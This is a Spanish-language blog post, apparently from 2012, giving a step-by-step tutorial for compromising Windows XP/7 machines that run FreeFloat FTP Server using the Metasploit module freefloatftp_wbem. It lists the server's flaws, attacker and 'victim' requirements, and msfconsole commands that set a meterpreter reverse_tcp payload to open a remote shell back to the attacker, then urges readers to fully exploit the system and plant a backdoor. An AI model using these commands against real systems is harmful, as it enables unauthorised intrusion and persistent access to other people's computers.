jueves, 13 de diciembre de 2012

[Metasploit] Atacando Windows mediante FreeFloat FTP Server Arbitrary File Upload




------------------------------------------------------------------------------------------------------------------
FreeFloat FTP Server es, como su nombre indica, una aplicación que nos permite compartir archivos y carpetas en la red. Toda la partición donde se inicia la utilidad es compartida por defecto. No se requiere la autenticación de usuario y el puerto predeterminado se puede cambiar, según nuestras necesidades.
------------------------------------------------------------------------------------------------------------------

Este Software actualmente ha sido vulnerado y permite a cualquier atacante penetrar cualquier Sistema Operativo Windows XP o 7 que tenga instalado y ejecutando dicho programa.

El modulo que se integro en Metasploit para explotar esta vulnerabilidad se aprovecha de diversos problemas en FreeFloat las cuales son:

  • No integra credenciales que se necesitan realmente para ingresar.
  • La ruta de los usuarios por defecto se encuentra en C:\ y esto no se puede cambiar.
  • El usuario puede escribir en cualquier parte del sistema de archivos del servidor.

Como resultado de estas implementaciones pobres, un usuario malintencionado puede simplemente entrar y luego cargar cualquier tipo de archivos.

Para explotar esta vulnerabilidad desde el Metasploit, los pasos son los siguientes:


REQUERIMIENTOS:

  • Backtrack 5 R1 - R2 o R3 (Atacante)
  • Metasploit Framework (Atacante)
  • Windows XP - 7 (Victima)
  • Free Float FTP Server (Victima)


PROCEDIMIENTOS:

Actualizamos nuestro Metasploit con msfupdate para obtener los nuevos exploits, en la cual se encuentra el freefloatftp_wbem (exploit para FreeFloat FTP Server) luego ejecutamos msfconsole y tecleamos los siguientes comandos:

-------------------------------------------------------------------------------------------------------------
use exploit/windows/ftp/freefloatftp_wbem
set payload windows/meterpreter/reverse_tcp
set Lhost 192.168.1.36 (Nuestra IP)
set RHOST 192.168.38 (IP Victima)
exploit
-------------------------------------------------------------------------------------------------------------


Después de ejecutar el comando exploit debemos asegurarnos que el usuario deba tener ejecutando el programa FreeFloat FTP Server en el modo "Start" para que nuestro exploit logre ejecutar el payload que vulnerara el sistema.


Seguidamente si el usuario mantiene ejecutado dicho programa, Metasploit se conectara y subirá el archivo NFSIf.exe y kQfzssDlqDGZO.mof en el sistema del usuario, devolviendo una session meterpreter si logra conectarse de una forma exitosa. 


Luego queda a nuestra imaginación explotar totalmente el sistema vulnerado y dejar una puerta trasera (backdoor) para volver a conectarnos cuando queramos.


VIDEOTUTORIAL:

REFERENCIAS:


Un saludo.

No hay comentarios:

Publicar un comentario en la entrada